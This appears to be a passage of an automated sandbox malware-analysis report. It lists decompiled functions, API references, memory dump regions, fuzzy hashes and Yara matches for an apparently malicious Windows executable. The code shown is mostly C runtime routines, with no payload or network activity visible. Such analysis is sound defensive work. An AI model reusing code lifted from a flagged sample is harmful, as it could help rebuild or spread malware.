                                                                                      			E00403B26(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x4ab4c8);
				_t8 = E004080B0(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E004080F5(_t8);
				}
				if( *0x4b94f4 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x4af848, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E004046FF(_t31);
						 *_t10 = E004046BD(GetLastError());
					}
					goto L9;
				}
				E004075B9(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E004075EC(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040761C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00403B7C();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                      0x00403b26
                                                                                      0x00403b28
                                                                                      0x00403b2d
                                                                                      0x00403b32
                                                                                      0x00403b37
                                                                                      0x00403bae
                                                                                      0x00403bb3
                                                                                      0x00403bb3
                                                                                      0x00403b40
                                                                                      0x00403b85
                                                                                      0x00403b86
                                                                                      0x00403b8e
                                                                                      0x00403b94
                                                                                      0x00403b96
                                                                                      0x00403b98
                                                                                      0x00403bab
                                                                                      0x00403bad
                                                                                      0x00000000
                                                                                      0x00403b96
                                                                                      0x00403b44
                                                                                      0x00403b4a
                                                                                      0x00403b4f
                                                                                      0x00403b55
                                                                                      0x00403b5a
                                                                                      0x00403b5c
                                                                                      0x00403b5d
                                                                                      0x00403b5e
                                                                                      0x00403b64
                                                                                      0x00403b65
                                                                                      0x00403b6c
                                                                                      0x00403b75
                                                                                      0x00000000
                                                                                      0x00403b77
                                                                                      0x00403b77
                                                                                      0x00000000
                                                                                      0x00403b77

                                                                                      APIs
                                                                                      • __lock.LIBCMT ref: 00403B44
                                                                                        • Part of subcall function 004075B9: __mtinitlocknum.LIBCMT ref: 004075CF
                                                                                        • Part of subcall function 004075B9: __amsg_exit.LIBCMT ref: 004075DB
                                                                                        • Part of subcall function 004075B9: EnterCriticalSection.KERNEL32(00408C04,00408C04,?,0040831D,00000004,004AB650,0000000C,00406754,00000001,00408C13,00000000,00000000,00000000,?,00408C13,00000001), ref: 004075E3
                                                                                      • ___sbh_find_block.LIBCMT ref: 00403B4F
                                                                                      • ___sbh_free_block.LIBCMT ref: 00403B5E
                                                                                      • HeapFree.KERNEL32(00000000,00000001,004AB4C8,0000000C,0040759A,00000000,004AB630,0000000C,004075D4,00000001,00408C04,?,0040831D,00000004,004AB650,0000000C), ref: 00403B8E
                                                                                      • GetLastError.KERNEL32(?,0040831D,00000004,004AB650,0000000C,00406754,00000001,00408C13,00000000,00000000,00000000,?,00408C13,00000001,00000214), ref: 00403B9F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                      • String ID:
                                                                                      • API String ID: 2714421763-0
                                                                                      • Opcode ID: a41e09eb454143b2dffd0775211ed32df59d1f4dc7de7b489de1431ef860ce1b
                                                                                      • Instruction ID: e16b63266c42bc1a039e8dc6048d318df18703d89f23cf521f4c63627a2e4780
                                                                                      • Opcode Fuzzy Hash: a41e09eb454143b2dffd0775211ed32df59d1f4dc7de7b489de1431ef860ce1b
                                                                                      • Instruction Fuzzy Hash: D0018431805601AADB207F729C09B5F3E789F01329F10053FF504761D2DB3CA640CAAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00852670, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: D
                                                                                      • API String ID: 2102423945-2746444292
                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction ID: bbfe2bf48be59de28dc210ac51ff6aee7de2674ab9abb4713081b1659473da5b
                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction Fuzzy Hash: CEE15C71D00219AACF24DBA4DD89FEEBBB8FF04305F1440A9E909E6190EB746A49CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084D8B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: $$$(
                                                                                      • API String ID: 2102423945-3551151888
                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction ID: 39ba8c286534b72b088a6d15923d15481065cc0a134a9d2a8b12f2a983c5fee1
                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction Fuzzy Hash: 45919F71D0021C9AEF21CFA4DC5ABEEBBB4FF05304F244169E505BB281DBB65A48CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040BFC6, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 28%
                                                                                      			E0040BFC6(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040BF34(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00404E99(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0040B9B1(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0040BC19(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00404E60(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                                      0x0040bfc6
                                                                                      0x0040bfc6
                                                                                      0x0040bfc6
                                                                                      0x0040bfc6
                                                                                      0x0040bfc6
                                                                                      0x0040bfcb
                                                                                      0x0040bfcf
                                                                                      0x0040bfd1
                                                                                      0x0040bfd4
                                                                                      0x0040bfd5
                                                                                      0x0040bfd6
                                                                                      0x0040bfd9
                                                                                      0x0040bfde
                                                                                      0x0040bfde
                                                                                      0x0040bfe1
                                                                                      0x0040bfe5
                                                                                      0x0040bfe8
                                                                                      0x0040bfed
                                                                                      0x0040bfea
                                                                                      0x0040bfea
                                                                                      0x0040bfea
                                                                                      0x0040bff0
                                                                                      0x0040bff5
                                                                                      0x0040bff7
                                                                                      0x0040bffa
                                                                                      0x0040bffd
                                                                                      0x0040bffe
                                                                                      0x0040c006
                                                                                      0x0040c00b
                                                                                      0x0040c00f
                                                                                      0x0040c012
                                                                                      0x0040c015
                                                                                      0x0040c01b
                                                                                      0x0040c01c
                                                                                      0x0040c01f
                                                                                      0x0040c029
                                                                                      0x0040c02d
                                                                                      0x00000000
                                                                                      0x0040c02d
                                                                                      0x0040c033

                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBCMT ref: 0040BFD9
                                                                                        • Part of subcall function 0040BF34: ___BuildCatchObjectHelper.LIBCMT ref: 0040BF6A
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 0040BFF0
                                                                                      • ___FrameUnwindToState.LIBCMT ref: 0040BFFE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                      • String ID: csm
                                                                                      • API String ID: 2163707966-1018135373
                                                                                      • Opcode ID: 65e56480dffb5ae128494c6c679018921c0179f8a752e43245547446811b7336
                                                                                      • Instruction ID: 143119bd7edf23cd9feb20ca85fc346c0dc8e7272f0b7ac94033c879f7bf42b5
                                                                                      • Opcode Fuzzy Hash: 65e56480dffb5ae128494c6c679018921c0179f8a752e43245547446811b7336
                                                                                      • Instruction Fuzzy Hash: 69014B7100010ABBDF125F52CC41EAB3F6AFF44344F00402ABD18752A1DB3A99B1EBE8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412FC9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 65%
                                                                                      			E00412FC9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x4a8d00;
					_v28 =  *0x4a8cf8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                      0x00412fce
                                                                                      0x00412fd6
                                                                                      0x00412fed
                                                                                      0x00412f99
                                                                                      0x00412fa2
                                                                                      0x00412fae
                                                                                      0x00412fb1
                                                                                      0x00412fb4
                                                                                      0x00412fb6
                                                                                      0x00412fb9
                                                                                      0x00412fbe
                                                                                      0x00412fc8
                                                                                      0x00412fc0
                                                                                      0x00412fc4
                                                                                      0x00412fc4
                                                                                      0x00412fd8
                                                                                      0x00412fde
                                                                                      0x00412fe6
                                                                                      0x00000000
                                                                                      0x00412fe8
                                                                                      0x00412fe8
                                                                                      0x00412fec
                                                                                      0x00412fec
                                                                                      0x00412fe6

                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040A457), ref: 00412FCE
                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00412FDE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                      • API String ID: 1646373207-3105848591
                                                                                      • Opcode ID: 696c5b6b70fecbcbef7714514f9b0ebb35562209ff519f240e0f194f2c56b334
                                                                                      • Instruction ID: ce2a444bca22ddad6f48e3d2ef0d65aa6a2f164b27bdff1f62dbcb6f90fbcb12
                                                                                      • Opcode Fuzzy Hash: 696c5b6b70fecbcbef7714514f9b0ebb35562209ff519f240e0f194f2c56b334
                                                                                      • Instruction Fuzzy Hash: 11F03030A44A0EE2EB001BA5BD0EBAF7E78FB91702F9204A5D592F00C4DF7484B1965A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403398, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 79%
                                                                                      			E00403398(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t27;
				void* _t29;
				intOrPtr* _t34;
				void* _t35;

				_push(0x44);
				E00405255(E004A6D99, __ebx, __edi, __esi);
				E00401CD9(_t35 - 0x28, "invalid string position");
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				_t27 = _t35 - 0x50;
				E00403311(_t27, _t35 - 0x28);
				E004052D2(_t35 - 0x50, 0x4ab430);
				asm("int3");
				_push(4);
				E00405255(E004A6DBC, __ebx, __edi, __esi);
				_t34 = _t27;
				 *((intOrPtr*)(_t35 - 0x10)) = _t34;
				_t31 =  *((intOrPtr*)(_t35 + 8));
				E00403A18(_t27, _t29,  *((intOrPtr*)(_t35 + 8)));
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				 *_t34 = 0x4a7268;
				E00401CFB(_t34 + 0xc, _t31 + 0xc);
				return E004052BE(_t34);
			}







                                                                                      0x00403398
                                                                                      0x0040339f
                                                                                      0x004033ac
                                                                                      0x004033b1
                                                                                      0x004033b9
                                                                                      0x004033bc
                                                                                      0x004033ca
                                                                                      0x004033cf
                                                                                      0x004033d0
                                                                                      0x004033d7
                                                                                      0x004033dc
                                                                                      0x004033de
                                                                                      0x004033e1
                                                                                      0x004033e5
                                                                                      0x004033ea
                                                                                      0x004033f5
                                                                                      0x004033fb
                                                                                      0x00403407

                                                                                      APIs
                                                                                      • __EH_prolog3.LIBCMT ref: 0040339F
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 004033BC
                                                                                        • Part of subcall function 00403311: std::runtime_error::runtime_error.LIBCPMT ref: 0040331C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004033CA
                                                                                        • Part of subcall function 004052D2: RaiseException.KERNEL32(?,?,0040450C,?,?,?,?,?,0040450C,?,004ABC00,004AF820,?,00402B86,00000001,?), ref: 00405314
                                                                                      Strings
                                                                                      • invalid string position, xrefs: 004033A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                      • String ID: invalid string position
                                                                                      • API String ID: 3299838469-1799206989
                                                                                      • Opcode ID: 9c8f2063cb40f5539996fe25a363e48e302d64478ad3885e0f2a29e8491bf070
                                                                                      • Instruction ID: b87caa312b8395cb55a45764c2a9bfb45235ad6508b2e5eef6ae8056ed4a0e91
                                                                                      • Opcode Fuzzy Hash: 9c8f2063cb40f5539996fe25a363e48e302d64478ad3885e0f2a29e8491bf070
                                                                                      • Instruction Fuzzy Hash: C8D01276A5010897CB04EAD1CC46BDD773CAF15318F58046FB201760C2DBBC5A048A28
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0088FBDE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0088FBF1
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC06
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: TeM$TeM
                                                                                      • API String ID: 3728558374-3870166017
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: bc927866261b58b21830ef725e61a80c2a429c546d5406d0ee7701bda1715e25
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 42D06775C0020CBBCF00EFA9D45ACDDBBB8EA14744B00C466A91897646EB74E3498B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084D0E0, Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0086197D: __wfsopen.LIBCMT ref: 00861988
                                                                                      • _fgetws.LIBCMT ref: 0084D15C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __wfsopen_fgetws
                                                                                      • String ID:
                                                                                      • API String ID: 853134316-0
                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction ID: f45374dda3b33e58242347bcb3c9b77f42c3b399eff2f01433551c1c2cd14b12
                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction Fuzzy Hash: 45919E72D0031D9BCF21DFA8C885BAEB7B5FF14304F150529E815E7241E776AA08CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084D540, Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1783060780-0
                                                                                      • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction ID: f6e02dda12e279041ae9174eab9231aba2f575b0c442e802805b5e3fd86ee2e5
                                                                                      • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction Fuzzy Hash: 5CA160B1C0024CEBEF11EBD8D84ABDEBB75FF15304F140028E505BA292D7765A48CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00414327, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00414327(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E004042F7( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0041243A( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E004046FF(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x75ff5003
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x75ff5003
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x75ff5003
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                      0x00414331
                                                                                      0x00414338
                                                                                      0x0041434f
                                                                                      0x00000000
                                                                                      0x0041433f
                                                                                      0x00414341
                                                                                      0x0041435b
                                                                                      0x00414360
                                                                                      0x00414363
                                                                                      0x00414366
                                                                                      0x0041438f
                                                                                      0x00414396
                                                                                      0x00414398
                                                                                      0x00414419
                                                                                      0x0041442b
                                                                                      0x00414434
                                                                                      0x00414436
                                                                                      0x00414376
                                                                                      0x00414376
                                                                                      0x00414379
                                                                                      0x0041437b
                                                                                      0x0041437e
                                                                                      0x0041437e
                                                                                      0x0041437e
                                                                                      0x0041437e
                                                                                      0x00000000
                                                                                      0x00414384
                                                                                      0x004143f8
                                                                                      0x004143f8
                                                                                      0x004143fd
                                                                                      0x00414403
                                                                                      0x00414406
                                                                                      0x00414408
                                                                                      0x0041440b
                                                                                      0x0041440b
                                                                                      0x0041440b
                                                                                      0x0041440b
                                                                                      0x00000000
                                                                                      0x0041440f
                                                                                      0x0041439a
                                                                                      0x0041439d
                                                                                      0x0041439d
                                                                                      0x004143a3
                                                                                      0x004143a6
                                                                                      0x004143cd
                                                                                      0x004143d0
                                                                                      0x004143d0
                                                                                      0x004143d6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004143d8
                                                                                      0x004143db
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004143dd
                                                                                      0x004143dd
                                                                                      0x004143dd
                                                                                      0x004143e3
                                                                                      0x004143e6
                                                                                      0x00414354
                                                                                      0x00414354
                                                                                      0x004143ef
                                                                                      0x00000000
                                                                                      0x004143ef
                                                                                      0x004143a8
                                                                                      0x004143ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004143af
                                                                                      0x004143bd
                                                                                      0x004143c0
                                                                                      0x004143c6
                                                                                      0x004143c8
                                                                                      0x004143cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004143cb
                                                                                      0x00414368
                                                                                      0x0041436b
                                                                                      0x0041436d
                                                                                      0x00414373
                                                                                      0x00414373
                                                                                      0x00000000
                                                                                      0x00414343
                                                                                      0x00414343
                                                                                      0x00414348
                                                                                      0x0041434c
                                                                                      0x0041434c
                                                                                      0x00000000
                                                                                      0x00414348
                                                                                      0x00414341

                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041435B
                                                                                      • __isleadbyte_l.LIBCMT ref: 0041438F
                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,004105DD,00000109,00BFBBEF,00000003), ref: 004143C0
                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,004105DD,00000109,00BFBBEF,00000003), ref: 0041442E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                      • String ID:
                                                                                      • API String ID: 3058430110-0
                                                                                      • Opcode ID: d9032bf244deee50afee4c11327133573360b0989e8050411d1d4d1ece1c927a
                                                                                      • Instruction ID: a4e4f2a512e3bba8090ed344a9828e621a322db48d8ff2693eb3dc40bc716d53
                                                                                      • Opcode Fuzzy Hash: d9032bf244deee50afee4c11327133573360b0989e8050411d1d4d1ece1c927a
                                                                                      • Instruction Fuzzy Hash: 2231E430B00259EFCB20DF64C8449EE3BA5EF81310B19856AE8748B291D334DD90DB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004028DA, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 83%
                                                                                      			E004028DA(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t27;
				intOrPtr* _t29;
				void* _t39;
				intOrPtr* _t40;
				void* _t50;
				void* _t51;
				intOrPtr* _t55;
				void* _t57;

				E004A6CC8(E004A6E45, _t57);
				_push(_t39);
				_t55 =  *((intOrPtr*)(_t57 + 8));
				_push(_t51);
				_t2 = _t55 + 4; // 0x4a99a8
				 *_t55 = 0x4a9960;
				E00403444(_t39, _t2, _t51, __eflags);
				_push(4);
				 *((intOrPtr*)(_t57 - 4)) = 0;
				_t40 = E004044A8(_t39, _t50, 0, __eflags);
				_t61 = _t40;
				if(_t40 == 0) {
					_t27 = 0;
					__eflags = 0;
				} else {
					 *_t40 = E004030B0(_t40, 0, _t55, _t61);
					E004011D6(E00402EDE());
					_t27 = _t40;
				}
				 *((intOrPtr*)(_t55 + 0x38)) = _t27;
				_t5 = _t55 + 0x18; // 0x4a99bc
				 *((intOrPtr*)(_t55 + 0x20)) = _t5;
				_t7 = _t55 + 0x1c; // 0x4a99c0
